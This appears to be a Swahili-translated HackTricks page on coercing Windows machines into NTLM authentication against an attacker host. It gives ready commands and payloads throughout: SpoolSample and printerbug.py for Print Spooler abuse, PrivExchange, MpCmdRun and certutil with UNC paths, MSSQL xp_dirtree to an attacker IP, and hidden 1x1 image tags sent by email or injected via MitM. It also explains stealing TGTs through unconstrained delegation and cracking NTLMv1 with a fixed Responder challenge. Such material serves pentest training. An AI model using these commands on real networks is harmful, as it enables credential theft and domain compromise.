Force NTLM Privileged Authentication

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

SharpSystemTriggers

SharpSystemTriggers ni mkusanyiko wa vichocheo vya uthibitishaji wa mbali vilivyoandikwa kwa C# kwa kutumia kisimbiko cha MIDL ili kuepuka kutegemea programu ya tatu.

Matumizi Mabaya ya Huduma ya Spooler

Ikiwa huduma ya Print Spooler ime wezeshwa, unaweza kutumia baadhi ya vitambulisho vya AD vilivyofahamika tayari kuomba kwa mwenyeji wa udhibiti wa kikoa sasisho kuhusu kazi mpya za uchapishaji na tuambie itume arifa kwa mfumo fulani. Kumbuka wakati printer inatuma arifa kwa mifumo isiyojulikana, inahitaji kuthibitisha dhidi ya mfumo huo. Kwa hivyo, mshambuliaji anaweza kufanya huduma ya Print Spooler kuthibitisha dhidi ya mfumo usiojulikana, na huduma hiyo itatumia akaunti ya kompyuta katika uthibitisho huu.

Kupata Seva za Windows kwenye kikoa

Kwa kutumia PowerShell, pata orodha ya sanduku za Windows. Seva kawaida ni kipaumbele, kwa hivyo tuangalie hapo:

Get-ADComputer -Filter {(OperatingSystem -like "*windows*server*") -and (OperatingSystem -notlike "2016") -and (Enabled -eq "True")} -Properties * | select Name | ft -HideTableHeaders > servers.txt

Kupata huduma za Spooler zinazosikiliza

Kwa kutumia @mysmartlogin's (Vincent Le Toux's) SpoolerScanner iliyobadilishwa kidogo, angalia ikiwa Huduma ya Spooler inasikiliza:

. .\Get-SpoolStatus.ps1
ForEach ($server in Get-Content servers.txt) {Get-SpoolStatus $server}

Unaweza pia kutumia rpcdump.py kwenye Linux na kutafuta Itifaki ya MS-RPRN

rpcdump.py DOMAIN/USER:PASSWORD@SERVER.DOMAIN.COM | grep MS-RPRN

Uliza huduma kujithibitisha dhidi ya mwenyeji wowote

Unaweza kuunda SpoolSample kutoka hapa.

SpoolSample.exe <TARGET> <RESPONDERIP>

au tumia dementor.py ya 3xocyte au printerbug.py ikiwa unatumia Linux

python dementor.py -d domain -u username -p password <RESPONDERIP> <TARGET>
printerbug.py 'domain/username:password'@<Printer IP> <RESPONDERIP>

Kuchanganya na Uteuzi Usiozuiliwa

Ikiwa mshambuliaji tayari amefanikiwa kudukua kompyuta na Uteuzi Usiozuiliwa, mshambuliaji anaweza kuwezesha printer kuthibitisha dhidi ya kompyuta hii. Kwa sababu ya uteuzi usiozuiliwa, TGT ya akaunti ya kompyuta ya printer itahifadhiwa katika kumbukumbu ya kompyuta yenye uteuzi usiozuiliwa. Kwa kuwa mshambuliaji tayari amedukua mwenyeji huu, ataweza kupata tiketi hii na kuitumia vibaya (Pass the Ticket).

Uthibitishaji wa RCP kwa nguvu

PrivExchange

Shambulio la PrivExchange ni matokeo ya kasoro iliyopatikana katika kipengele cha PushSubscription cha Seva ya Kubadilishana. Kipengele hiki kinawezesha seva ya Kubadilishana kulazimishwa na mtumiaji yeyote wa kikoa mwenye sanduku la barua kuthibitisha kwa mwenyeji wowote uliowekwa na mteja kupitia HTTP.

Kwa chaguo-msingi, huduma ya Kubadilishana inaendeshwa kama SYSTEM na inapewa mamlaka ya ziada (hasa, ina mamlaka ya WriteDacl kwenye kiwango cha kikoa kabla ya Sasisho la Kumulati la 2019). Kasoro hii inaweza kutumiwa kuwezesha kuhamisha habari kwa LDAP na kisha kuchota hifadhidata ya NTDS ya kikoa. Katika hali ambapo kuhamisha kwa LDAP sio rahisi, kasoro hii bado inaweza kutumika kuhamisha na kuthibitisha kwa wenyewe kwenye mwenyeji mwingine ndani ya kikoa. Ufanisi wa shambulio hili unatoa ufikiaji wa moja kwa moja kwa Msimamizi wa Kikoa na akaunti yoyote ya mtumiaji wa kikoa iliyothibitishwa.

Ndani ya Windows

Ikiwa tayari umo ndani ya kompyuta ya Windows, unaweza kulazimisha Windows kuunganisha kwenye seva kwa kutumia akaunti zenye mamlaka kwa:

Defender MpCmdRun

C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe -Scan -ScanType 3 -File \\<YOUR IP>\file.txt

MSSQL

MSSQL ni mfumo wa usimamizi wa database uliotengenezwa na Microsoft. Inatumika sana katika mazingira ya biashara kwa kuhifadhi na kusimamia data. Kwa sababu ya umaarufu wake, MSSQL mara nyingi hulengwa na wadukuzi kwa sababu ya uwezekano wa kupata data nyeti.

Kuna njia kadhaa za kudukua MSSQL, ikiwa ni pamoja na:

  1. Brute forcing: Kudukua nywila za akaunti za MSSQL kwa kujaribu nywila nyingi hadi kupata ile sahihi.

  2. SQL injection: Kuingiza maagizo ya SQL yasiyofaa katika maombi yanayotumia MSSQL, ambayo inaweza kusababisha kufichuliwa kwa data nyeti au hata kudhibitiwa kwa seva.

  3. Exploiting vulnerabilities: Kutumia udhaifu katika programu ya MSSQL ili kupata ufikiaji usioidhinishwa au kudhibiti seva.

  4. Default credentials: Kujaribu kuingia kwenye seva ya MSSQL kwa kutumia nywila za chaguo-msingi ambazo mara nyingi haziwekwi na watumiaji.

Ni muhimu kwa wamiliki wa seva za MSSQL kuchukua hatua za usalama ili kuzuia mashambulizi haya. Hii inaweza kujumuisha kuanzisha nywila ngumu, kusasisha programu na kurekebisha udhaifu, na kufuatilia shughuli za seva kwa dalili za shughuli za kudukua.

EXEC xp_dirtree '\\10.10.17.231\pwn', 1, 1

Au tumia mbinu hii nyingine: https://github.com/p0dalirius/MSSQL-Analysis-Coerce

Certutil

Inawezekana kutumia certutil.exe lolbin (faili iliyosainiwa na Microsoft) kuchochea uthibitishaji wa NTLM:

certutil.exe -syncwithWU  \\127.0.0.1\share

Uingizaji wa HTML

Kupitia barua pepe

Ikiwa unajua anwani ya barua pepe ya mtumiaji anayeingia kwenye kifaa unachotaka kudukua, unaweza tu kumtumia barua pepe yenye picha ya 1x1 kama vile

<img src="\\10.10.17.231\test.ico" height="1" width="1" />

na wakati anapofungua, atajaribu kujithibitisha.

MitM

Ikiwa unaweza kufanya shambulio la MitM kwa kompyuta na kuingiza HTML katika ukurasa ambao atauona, unaweza kujaribu kuingiza picha kama ifuatavyo katika ukurasa:

<img src="\\10.10.17.231\test.ico" height="1" width="1" />

Kuvunja NTLMv1

Ikiwa unaweza kukamata changamoto za NTLMv1 soma hapa jinsi ya kuzivunja. Kumbuka kwamba ili kuvunja NTLMv1 unahitaji kuweka changamoto ya Responder kuwa "1122334455667788"

Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na htARTE (HackTricks AWS Red Team Expert)!

Last updated